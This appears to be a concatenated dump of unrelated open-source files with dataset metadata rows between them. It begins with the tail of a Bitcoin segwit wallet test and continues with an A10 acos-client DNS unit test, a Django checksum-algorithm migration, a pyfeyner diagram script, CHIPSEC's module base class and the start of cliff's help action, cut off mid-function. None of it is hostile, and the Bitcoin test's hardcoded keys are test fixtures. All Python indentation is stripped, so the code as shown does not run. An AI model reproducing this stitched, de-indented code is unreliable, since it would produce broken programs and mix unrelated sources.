# P2WPKH and P2SH_P2WPKH with compressed keys should always be spendable
spendable_anytime.extend([p2wpkh, p2sh_p2wpkh])
for i in uncompressed_spendable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# p2sh multisig with uncompressed keys should always be spendable
spendable_anytime.extend([p2sh])
# bare multisig can be watched and signed, but is not treated as ours
solvable_after_importaddress.extend([bare])
# P2WSH and P2SH(P2WSH) multisig with uncompressed keys are never seen
unseen_anytime.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH and P2PK with uncompressed keys should always be spendable
spendable_anytime.extend([p2pkh, p2pk])
# P2SH_P2PK and P2SH_P2PKH are spendable after direct importaddress
spendable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh])
# Witness output types with uncompressed keys are never seen
unseen_anytime.extend([p2wpkh, p2sh_p2wpkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
for i in compressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
# Multisig without private is not seen after addmultisigaddress, but seen after importaddress
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
solvable_after_importaddress.extend([bare, p2sh, p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH, P2PK, P2WPKH and P2SH_P2WPKH with compressed keys should always be seen
solvable_anytime.extend([p2pkh, p2pk, p2wpkh, p2sh_p2wpkh])
# P2SH_P2PK, P2SH_P2PKH with compressed keys are seen after direct importaddress
solvable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
for i in uncompressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# Base uncompressed multisig without private is not seen after addmultisigaddress, but seen after importaddress
solvable_after_importaddress.extend([bare, p2sh])
# P2WSH and P2SH(P2WSH) multisig with uncompressed keys are never seen
unseen_anytime.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# normal P2PKH and P2PK with uncompressed keys should always be seen
solvable_anytime.extend([p2pkh, p2pk])
# P2SH_P2PK, P2SH_P2PKH with uncompressed keys are seen after direct importaddress
solvable_after_importaddress.extend([p2sh_p2pk, p2sh_p2pkh])
# Witness output types with uncompressed keys are never seen
unseen_anytime.extend([p2wpkh, p2sh_p2wpkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh])
op1 = CScript([OP_1])
op0 = CScript([OP_0])
# 2N7MGY19ti4KDMSzRfPAssP6Pxyuxoi6jLe is the P2SH(P2PKH) version of mjoE3sSrb8ByYEvgnC3Aox86u1CHnfJA4V
unsolvable_address_key = hex_str_to_bytes("02341AEC7587A51CDE5279E0630A531AEA2615A9F80B17E8D9376327BAEAA59E3D")
unsolvablep2pkh = CScript([OP_DUP, OP_HASH160, hash160(unsolvable_address_key), OP_EQUALVERIFY, OP_CHECKSIG])
unsolvablep2wshp2pkh = CScript([OP_0, sha256(unsolvablep2pkh)])
p2shop0 = CScript([OP_HASH160, hash160(op0), OP_EQUAL])
p2wshop1 = CScript([OP_0, sha256(op1)])
unsolvable_after_importaddress.append(unsolvablep2pkh)
unsolvable_after_importaddress.append(unsolvablep2wshp2pkh)
unsolvable_after_importaddress.append(op1) # OP_1 will be imported as script
unsolvable_after_importaddress.append(p2wshop1)
unseen_anytime.append(op0) # OP_0 will be imported as P2SH address with no script provided
unsolvable_after_importaddress.append(p2shop0)
spendable_txid = []
solvable_txid = []
spendable_txid.append(self.mine_and_test_listunspent(spendable_anytime, 2))
solvable_txid.append(self.mine_and_test_listunspent(solvable_anytime, 1))
self.mine_and_test_listunspent(spendable_after_importaddress + solvable_after_importaddress + unseen_anytime + unsolvable_after_importaddress, 0)
importlist = []
for i in compressed_spendable_address + uncompressed_spendable_address + compressed_solvable_address + uncompressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
bare = hex_str_to_bytes(v['hex'])
importlist.append(bare.hex())
importlist.append(CScript([OP_0, sha256(bare)]).hex())
else:
pubkey = hex_str_to_bytes(v['pubkey'])
p2pk = CScript([pubkey, OP_CHECKSIG])
p2pkh = CScript([OP_DUP, OP_HASH160, hash160(pubkey), OP_EQUALVERIFY, OP_CHECKSIG])
importlist.append(p2pk.hex())
importlist.append(p2pkh.hex())
importlist.append(CScript([OP_0, hash160(pubkey)]).hex())
importlist.append(CScript([OP_0, sha256(p2pk)]).hex())
importlist.append(CScript([OP_0, sha256(p2pkh)]).hex())
importlist.append(unsolvablep2pkh.hex())
importlist.append(unsolvablep2wshp2pkh.hex())
importlist.append(op1.hex())
importlist.append(p2wshop1.hex())
for i in importlist:
# import all generated addresses. The wallet already has the private keys for some of these, so catch JSON RPC
# exceptions and continue.
try_rpc(-4, "The wallet already contains the private key for this address or script", self.nodes[0].importaddress, i, "", False, True)
self.nodes[0].importaddress(script_to_p2sh(op0)) # import OP_0 as address only
self.nodes[0].importaddress(multisig_without_privkey_address) # Test multisig_without_privkey
spendable_txid.append(self.mine_and_test_listunspent(spendable_anytime + spendable_after_importaddress, 2))
solvable_txid.append(self.mine_and_test_listunspent(solvable_anytime + solvable_after_importaddress, 1))
self.mine_and_test_listunspent(unsolvable_after_importaddress, 1)
self.mine_and_test_listunspent(unseen_anytime, 0)
spendable_txid.append(self.mine_and_test_listunspent(spendable_anytime + spendable_after_importaddress, 2))
solvable_txid.append(self.mine_and_test_listunspent(solvable_anytime + solvable_after_importaddress, 1))
self.mine_and_test_listunspent(unsolvable_after_importaddress, 1)
self.mine_and_test_listunspent(unseen_anytime, 0)
# Repeat some tests. This time we don't add witness scripts with importaddress
# Import a compressed key and an uncompressed key, generate some multisig addresses
self.nodes[0].importprivkey("927pw6RW8ZekycnXqBQ2JS5nPyo1yRfGNN8oq74HeddWSpafDJH")
uncompressed_spendable_address = ["mguN2vNSCEUh6rJaXoAVwY3YZwZvEmf5xi"]
self.nodes[0].importprivkey("cMcrXaaUC48ZKpcyydfFo8PxHAjpsYLhdsp6nmtB3E2ER9UUHWnw")
compressed_spendable_address = ["n1UNmpmbVUJ9ytXYXiurmGPQ3TRrXqPWKL"]
self.nodes[0].importpubkey(pubkeys[5])
compressed_solvable_address = [key_to_p2pkh(pubkeys[5])]
self.nodes[0].importpubkey(pubkeys[6])
uncompressed_solvable_address = [key_to_p2pkh(pubkeys[6])]
unseen_anytime = [] # These outputs should never be seen
solvable_anytime = [] # These outputs should be solvable after importpubkey
unseen_anytime = [] # These outputs should never be seen
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [uncompressed_spendable_address[0], uncompressed_spendable_address[0]])['address'])
compressed_spendable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_spendable_address[0]])['address'])
uncompressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_solvable_address[0], uncompressed_solvable_address[0]])['address'])
compressed_solvable_address.append(self.nodes[0].addmultisigaddress(2, [compressed_spendable_address[0], compressed_solvable_address[0]])['address'])
premature_witaddress = []
for i in compressed_spendable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
premature_witaddress.append(script_to_p2sh(p2wsh))
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# P2WPKH, P2SH_P2WPKH are always spendable
spendable_anytime.extend([p2wpkh, p2sh_p2wpkh])
for i in uncompressed_spendable_address + uncompressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
# P2WSH and P2SH(P2WSH) multisig with uncompressed keys are never seen
unseen_anytime.extend([p2wsh, p2sh_p2wsh])
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# P2WPKH, P2SH_P2WPKH with uncompressed keys are never seen
unseen_anytime.extend([p2wpkh, p2sh_p2wpkh])
for i in compressed_solvable_address:
v = self.nodes[0].getaddressinfo(i)
if (v['isscript']):
[bare, p2sh, p2wsh, p2sh_p2wsh] = self.p2sh_address_to_script(v)
premature_witaddress.append(script_to_p2sh(p2wsh))
else:
[p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh] = self.p2pkh_address_to_script(v)
# P2SH_P2PK, P2SH_P2PKH with compressed keys are always solvable
solvable_anytime.extend([p2wpkh, p2sh_p2wpkh])
self.mine_and_test_listunspent(spendable_anytime, 2)
self.mine_and_test_listunspent(solvable_anytime, 1)
self.mine_and_test_listunspent(unseen_anytime, 0)
# Check that createrawtransaction/decoderawtransaction with non-v0 Bech32 works
v1_addr = program_to_witness(1, [3, 5])
v1_tx = self.nodes[0].createrawtransaction([getutxo(spendable_txid[0])], {v1_addr: 1})
v1_decoded = self.nodes[1].decoderawtransaction(v1_tx)
assert_equal(v1_decoded['vout'][0]['scriptPubKey']['addresses'][0], v1_addr)
assert_equal(v1_decoded['vout'][0]['scriptPubKey']['hex'], "51020305")
# Check that spendable outputs are really spendable
self.create_and_mine_tx_from_txids(spendable_txid)
# import all the private keys so solvable addresses become spendable
self.nodes[0].importprivkey("cPiM8Ub4heR9NBYmgVzJQiUH1if44GSBGiqaeJySuL2BKxubvgwb")
self.nodes[0].importprivkey("cPpAdHaD6VoYbW78kveN2bsvb45Q7G5PhaPApVUGwvF8VQ9brD97")
self.nodes[0].importprivkey("91zqCU5B9sdWxzMt1ca3VzbtVm2YM6Hi5Rxn4UDtxEaN9C9nzXV")
self.nodes[0].importprivkey("cPQFjcVRpAUBG8BA9hzr2yEzHwKoMgLkJZBBtK9vJnvGJgMjzTbd")
self.nodes[0].importprivkey("cQGtcm34xiLjB1v7bkRa4V3aAc9tS2UTuBZ1UnZGeSeNy627fN66")
self.nodes[0].importprivkey("cTW5mR5M45vHxXkeChZdtSPozrFwFgmEvTNnanCW6wrqwaCZ1X7K")
self.create_and_mine_tx_from_txids(solvable_txid)
# Test that importing native P2WPKH/P2WSH scripts works
for use_p2wsh in [False, True]:
if use_p2wsh:
scriptPubKey = "00203a59f3f56b713fdcf5d1a57357f02c44342cbf306ffe0c4741046837bf90561a"
transaction = "01000000000100e1f505000000002200203a59f3f56b713fdcf5d1a57357f02c44342cbf306ffe0c4741046837bf90561a00000000"
else:
scriptPubKey = "a9142f8c469c2f0084c48e11f998ffbe7efa7549f26d87"
transaction = "01000000000100e1f5050000000017a9142f8c469c2f0084c48e11f998ffbe7efa7549f26d8700000000"
self.nodes[1].importaddress(scriptPubKey, "", False)
rawtxfund = self.nodes[1].fundrawtransaction(transaction)['hex']
rawtxfund = self.nodes[1].signrawtransactionwithwallet(rawtxfund)["hex"]
txid = self.nodes[1].sendrawtransaction(rawtxfund)
assert_equal(self.nodes[1].gettransaction(txid, True)["txid"], txid)
assert_equal(self.nodes[1].listtransactions("*", 1, 0, True)[0]["txid"], txid)
# Assert it is properly saved
self.stop_node(1)
self.start_node(1)
assert_equal(self.nodes[1].gettransaction(txid, True)["txid"], txid)
assert_equal(self.nodes[1].listtransactions("*", 1, 0, True)[0]["txid"], txid)
def mine_and_test_listunspent(self, script_list, ismine):
utxo = find_spendable_utxo(self.nodes[0], 50)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(int('0x' + utxo['txid'], 0), utxo['vout'])))
for i in script_list:
tx.vout.append(CTxOut(10000000, i))
tx.rehash()
signresults = self.nodes[0].signrawtransactionwithwallet(tx.serialize_without_witness().hex())['hex']
txid = self.nodes[0].sendrawtransaction(signresults, 0)
txs_mined[txid] = self.nodes[0].generate(1)[0]
sync_blocks(self.nodes)
watchcount = 0
spendcount = 0
for i in self.nodes[0].listunspent():
if (i['txid'] == txid):
watchcount += 1
if i['spendable']:
spendcount += 1
if (ismine == 2):
assert_equal(spendcount, len(script_list))
elif (ismine == 1):
assert_equal(watchcount, len(script_list))
assert_equal(spendcount, 0)
else:
assert_equal(watchcount, 0)
return txid
def p2sh_address_to_script(self, v):
bare = CScript(hex_str_to_bytes(v['hex']))
p2sh = CScript(hex_str_to_bytes(v['scriptPubKey']))
p2wsh = CScript([OP_0, sha256(bare)])
p2sh_p2wsh = CScript([OP_HASH160, hash160(p2wsh), OP_EQUAL])
return([bare, p2sh, p2wsh, p2sh_p2wsh])
def p2pkh_address_to_script(self, v):
pubkey = hex_str_to_bytes(v['pubkey'])
p2wpkh = CScript([OP_0, hash160(pubkey)])
p2sh_p2wpkh = CScript([OP_HASH160, hash160(p2wpkh), OP_EQUAL])
p2pk = CScript([pubkey, OP_CHECKSIG])
p2pkh = CScript(hex_str_to_bytes(v['scriptPubKey']))
p2sh_p2pk = CScript([OP_HASH160, hash160(p2pk), OP_EQUAL])
p2sh_p2pkh = CScript([OP_HASH160, hash160(p2pkh), OP_EQUAL])
p2wsh_p2pk = CScript([OP_0, sha256(p2pk)])
p2wsh_p2pkh = CScript([OP_0, sha256(p2pkh)])
p2sh_p2wsh_p2pk = CScript([OP_HASH160, hash160(p2wsh_p2pk), OP_EQUAL])
p2sh_p2wsh_p2pkh = CScript([OP_HASH160, hash160(p2wsh_p2pkh), OP_EQUAL])
return [p2wpkh, p2sh_p2wpkh, p2pk, p2pkh, p2sh_p2pk, p2sh_p2pkh, p2wsh_p2pk, p2wsh_p2pkh, p2sh_p2wsh_p2pk, p2sh_p2wsh_p2pkh]
def create_and_mine_tx_from_txids(self, txids, success=True):
tx = CTransaction()
for i in txids:
txtmp = CTransaction()
txraw = self.nodes[0].getrawtransaction(i, 0, txs_mined[i])
f = BytesIO(hex_str_to_bytes(txraw))
txtmp.deserialize(f)
for j in range(len(txtmp.vout)):
tx.vin.append(CTxIn(COutPoint(int('0x' + i, 0), j)))
tx.vout.append(CTxOut(0, CScript()))
tx.rehash()
signresults = self.nodes[0].signrawtransactionwithwallet(tx.serialize_without_witness().hex())['hex']
self.nodes[0].sendrawtransaction(signresults, 0)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
if __name__ == '__main__':
SegWitTest().main()
| mit | 2,694,981,483,760,619,500 | 60.056951 | 224 | 0.656306 | false |
a10networks/acos-client | acos_client/tests/unit/v30/test_dns.py | 1 | 3344 | # Copyright (C) 2016, A10 Networks Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
try:
import unittest
from unittest import mock
except ImportError:
import mock
import unittest2 as unittest
from acos_client.v30 import dns
class TestDns(unittest.TestCase):
def setUp(self):
self.client = mock.MagicMock()
self.target = dns.DNS(self.client)
self.url_prefix = "/axapi/v3/ip/dns/"
def test_primary_ipv4(self):
expected = '192.0.2.4'
self.target.set(primary=expected)
expected_payload = {'primary': {'ip-v4-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'primary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_primary_ipv6(self):
expected = '0:0:0:0:0:FFFF:129.144.52.38'
self.target.set(primary=expected)
expected_payload = {'primary': {'ip-v6-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'primary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_secondary_ipv4(self):
expected = '192.0.2.5'
self.target.set(secondary=expected)
expected_payload = {'secondary': {'ip-v4-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'secondary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_secondary_ipv6(self):
expected = '0:0:0:0:0:FFFF:129.144.52.39'
self.target.set(secondary=expected)
expected_payload = {'secondary': {'ip-v6-addr': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'secondary',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
def test_suffix(self):
expected = 'example.com'
self.target.set(suffix=expected)
expected_payload = {'suffix': {'domain-name': expected}}
self.client.http.request.assert_called_with("POST", self.url_prefix + 'suffix',
expected_payload, mock.ANY, axapi_args=None,
max_retries=None, timeout=mock.ANY)
| apache-2.0 | -3,787,857,098,440,864,300 | 40.283951 | 96 | 0.57506 | false |
EBI-Metagenomics/emgapi | emgapi/migrations/0028_auto_20200706_1823.py | 1 | 1069 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2020-06-16 12:02
from __future__ import unicode_literals
from django.db import migrations
def add_checksum_algorithms(apps, schema_editor):
"""
Add hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
ChecksumAlgorithms.objects.get_or_create(name=alg)
def remove_checksum_algorithms(apps, schema_editor):
"""
Remove hash algorithms:
- SHA1
- SHA256
- MD5
"""
ChecksumAlgorithms = apps.get_model("emgapi", "ChecksumAlgorithm")
for alg in ["SHA1", "SHA256", "MD5"]:
try:
ChecksumAlgorithms.objects.get(name=alg).delete()
except ChecksumAlgorithms.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('emgapi', '0027_auto_20200706_1823'),
]
operations = [
migrations.RunPython(add_checksum_algorithms, reverse_code=remove_checksum_algorithms)
]
| apache-2.0 | 3,405,595,739,773,955,600 | 24.452381 | 94 | 0.637979 | false |
itoijala/pyfeyner | examples/pyfeyn-test3.py | 1 | 2416 | #!/usr/bin/env python2
#
# pyfeyner - a simple Python interface for making Feynman diagrams.
# Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel
# Copyright (C) 2013 Ismo Toijala
#
# pyfeyner is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyfeyner is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with pyfeyner; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## A B-meson colour-suppressed penguin decay diagram
# _
# in1 ------(_)------() out1a
# \ ____() out1b
# \(____
# () out2a
# in2 ---------------() out2b
#
from pyfeyner.user import *
import pyx
fd = FeynDiagram()
in1 = Point(1, 7)
loop_in = Vertex(4, 7)
loop_out = Vertex(7, 7)
out1a = Point(11, 7)
out1b = Point(11, 5)
in2 = Point(1, 0)
out2a = Point(11, 2)
out2b = Point(11, 0)
out1c = Vertex(out1b.x() - 2, out1b.y())
out1d = Vertex(out2a.x() - 2, out2a.y())
vtx = Vertex(out1c.midpoint(out1d).x() - 1.5, out1c.midpoint(out1d).y())
fd.add(Fermion(out2b, in2).addArrow().addLabel(r"\APdown"))
fd.add(Fermion(in1, loop_in).addArrow().addLabel(r"\Pbottom"))
fd.add(Fermion(loop_out, out1a).addArrow().addLabel(r"\Pstrange"))
fd.add(Photon(loop_in, loop_out).bend(-1.5).addLabel(r"\PWplus"))
f_loop, = fd.add(Fermion(loop_in, loop_out).bend(+1.5).addArrow() \
.addLabel(r"\Pup,\,\Pcharm,\,\Ptop"))
fd.add(Photon(f_loop.fracpoint(0.6), vtx).addLabel(r"\Pphoton/\PZ", displace=0.5).bend(0.5))
fd.add(Fermion(out1b, out1c).addArrow(0.8).addLabel(r"\APup"))
fd.add(Fermion(out1c, out1d).arcThru(vtx))
fd.add(Fermion(out1d, out2a).addArrow(0.2).addLabel(r"\Pup"))
fd.add(Ellipse(x=1, y=3.5, xradius=1, yradius=3.5).setFillStyle(pyx.pattern.crosshatched(0.1, 45)))
fd.add(Ellipse(x=11, y=6, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.add(Ellipse(x=11, y=1, xradius=0.6, yradius=1).setFillStyle(pyx.pattern.hatched135))
fd.draw("pyfeyn-test3.pdf")
| gpl-2.0 | 8,639,295,022,185,520,000 | 36.75 | 99 | 0.678394 | false |
johnloucaides/chipsec | chipsec/module_common.py | 1 | 3593 | #!/usr/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
# (c) 2010-2012 Intel Corporation
#
# -------------------------------------------------------------------------------
"""
Common include file for modules
"""
import platform
import string
import sys
import os
from time import localtime, strftime
import chipsec.logger
import chipsec.chipset
import chipsec.defines
class ModuleResult:
FAILED = 0
PASSED = 1
WARNING = 2
SKIPPED = 3
DEPRECATED = 4
INFORMATION = 5
ERROR = -1
ModuleResultName = {
ModuleResult.FAILED: "Failed",
ModuleResult.PASSED: "Passed",
ModuleResult.WARNING: "Warning",
ModuleResult.SKIPPED: "Skipped",
ModuleResult.DEPRECATED: "Deprecated",
ModuleResult.INFORMATION: "Information",
ModuleResult.ERROR: "Error"
}
def getModuleResultName(res):
return ModuleResultName[res] if res in ModuleResultName else ModuleResultName[ModuleResult.ERROR]
class BaseModule(object):
def __init__(self):
self.cs = chipsec.chipset.cs()
self.logger = chipsec.logger.logger()
self.res = ModuleResult.PASSED
def is_supported(self):
"""
        This method should be overridden by the module, returning True or False
        depending on whether this module is supported on the currently running
        platform.
To access the currently running platform use
>>> self.cs.get_chipset_id()
"""
return True
def update_res(self, value):
if self.res == ModuleResult.WARNING:
if value == ModuleResult.FAILED \
or value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.FAILED:
if value == ModuleResult.ERROR:
self.res = value
elif self.res == ModuleResult.INFORMATION:
self.res = value
else: # PASSED or SKIPPED or DEPRECATED
self.res = value
def run(self, module_argv):
        raise NotImplementedError('subclasses should override the run() method')
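# --- Editor's illustrative sketch (not part of CHIPSEC itself) ---
# Minimal shape of a concrete module built on BaseModule. Real modules live under
# chipsec/modules/ and are discovered by the framework; the check below is only a
# placeholder, and logger.start_test() is assumed to exist as used by typical modules.
class _ExampleModule(BaseModule):
    def is_supported(self):
        # Restrict the module to applicable platforms; True means "run everywhere".
        return True
    def run(self, module_argv):
        self.logger.start_test("Example check (illustrative placeholder only)")
        # A real module would inspect hardware via self.cs here and call
        # self.update_res() with FAILED/WARNING as findings accumulate.
        self.res = ModuleResult.PASSED
        return self.res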
MTAG_BIOS = "BIOS"
MTAG_SMM = "SMM"
MTAG_SECUREBOOT = "SECUREBOOT"
MTAG_HWCONFIG = "HWCONFIG"
MTAG_CPU = "CPU"
##! [Available Tags]
MTAG_METAS = {
MTAG_BIOS: "System Firmware (BIOS/UEFI) Modules",
MTAG_SMM: "System Management Mode (SMM) Modules",
MTAG_SECUREBOOT: "Secure Boot Modules",
MTAG_HWCONFIG: "Hardware Configuration Modules",
MTAG_CPU: "CPU Modules",
}
##! [Available Tags]
MODULE_TAGS = dict( [(_tag, []) for _tag in MTAG_METAS])
#
# Common module command line options
#
OPT_MODIFY = 'modify'
| gpl-2.0 | 2,244,424,559,796,795,000 | 27.515873 | 101 | 0.629001 | false |
mbollmann/perceptron | mmb_perceptron/feature_extractor/generator/generative_extractor.py | 1 | 3342 | # -*- coding: utf-8 -*-
import numpy as np
from .. import FeatureExtractor
class GenerativeExtractor(FeatureExtractor):
"""Abstract base class for a generative feature extractor.
Compared to simple feature extractors, generators perform the additional
task of generating class label candidates. This means that they don't
return a single feature vector, but a dictionary mapping candidate classes
(for the classifier) to their respective feature vectors.
In terms of the perceptron algorithm, they combine the GEN() and Phi()
functions in a single object for ease of implementation.
"""
def _rebind_methods(self, status):
super(GenerativeExtractor, self)._rebind_methods(status)
if status:
self.generate = self._generate_sequenced
self.generate_vector = self._generate_vector_sequenced
else:
self.generate = self._generate_independent
self.generate_vector = self._generate_vector_independent
def _generate_independent(self, x, truth=None):
"""Return candidates and their feature representations.
Should return a tuple (F, C), where F is a list of feature
representations, and C is a list of class labels so that C[i] is the
class label belonging to the feature representation F[i].
During training, the **first element in these lists** is considered by
the perceptron to be the **correct class label** for this data point.
If the parameter 'truth' is supplied, it indicates the gold-standard
best candidate according to the training data; however, it is up to the
generator function whether to include this value as the first element of
the feature representations (thereby making the **gold standard** the
correct class label for the perceptron learner) or generate the
candidates independently and select an **oracle-best** class label from
those.
"""
raise NotImplementedError("function not implemented")
def _generate_sequenced(self, seq, pos, history=None, truth=None):
raise NotImplementedError("function not implemented")
def _generate_vector_independent(self, x, truth=None, grow=True):
"""Return candidates and their feature representations.
Identical to _generate_independent(), except that F is now a matrix of
numerical feature vectors.
"""
(features, labels) = self._generate_independent(x, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
def _generate_vector_sequenced(self, seq, pos, history=None, truth=None, grow=True):
(features, labels) = \
self._generate_sequenced(seq, pos, history=history, truth=truth)
if grow:
for f in features:
self._label_mapper.extend(f)
vectors = np.array([self._label_mapper.map_to_vector(f) for f in features])
else:
vectors = np.array([self._label_mapper.get_vector(f) for f in features])
return (vectors, labels)
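# --- Editor's illustrative sketch (not part of the original module) ---
# A toy concrete generator showing the (features, labels) contract documented in
# _generate_independent(): the first candidate is treated as the correct label
# during training when 'truth' is supplied. The suffix-based candidates and the
# dict-of-named-features representation are assumptions made purely for illustration.
class _ExampleSuffixGenerator(GenerativeExtractor):
    def _generate_independent(self, x, truth=None):
        # Candidate labels; put the gold-standard label first if it is known.
        candidates = [x, x + "s", x + "ed"]
        if truth is not None:
            candidates = [truth] + [c for c in candidates if c != truth]
        # One feature representation per candidate.
        features = [{"word=" + x: 1.0, "candidate=" + c: 1.0} for c in candidates]
        return (features, candidates)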
| mit | -3,316,705,741,891,611,600 | 44.162162 | 88 | 0.666966 | false |
openstack/cliff | cliff/help.py | 1 | 4846 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import inspect
import traceback
from . import command
class HelpExit(SystemExit):
"""Special exception type to trigger quick exit from the application
We subclass from SystemExit to preserve API compatibility for
anything that used to catch SystemExit, but use a different class
so that cliff's Application can tell the difference between
something trying to hard-exit and help saying it's done.
"""
class HelpAction(argparse.Action):
"""Provide a custom action so the -h and --help options
to the main app will print a list of the commands.
The commands are determined by checking the CommandManager
instance, passed in as the "default" value for the action.
"""
def __call__(self, parser, namespace, values, option_string=None):
app = self.default
parser.print_help(app.stdout)
app.stdout.write('\nCommands:\n')
dists_by_module = command._get_distributions_by_modules()
def dist_for_obj(obj):
name = inspect.getmodule(obj).__name__.partition('.')[0]
return dists_by_module.get(name)
app_dist = dist_for_obj(app)
command_manager = app.command_manager
for name, ep in sorted(command_manager):
try:
factory = ep.load()
except Exception:
app.stdout.write('Could not load %r\n' % ep)
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
try:
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(factory.__init__).args:
kwargs['cmd_name'] = name
cmd = factory(app, None, **kwargs)
if cmd.deprecated:
continue
except Exception as err:
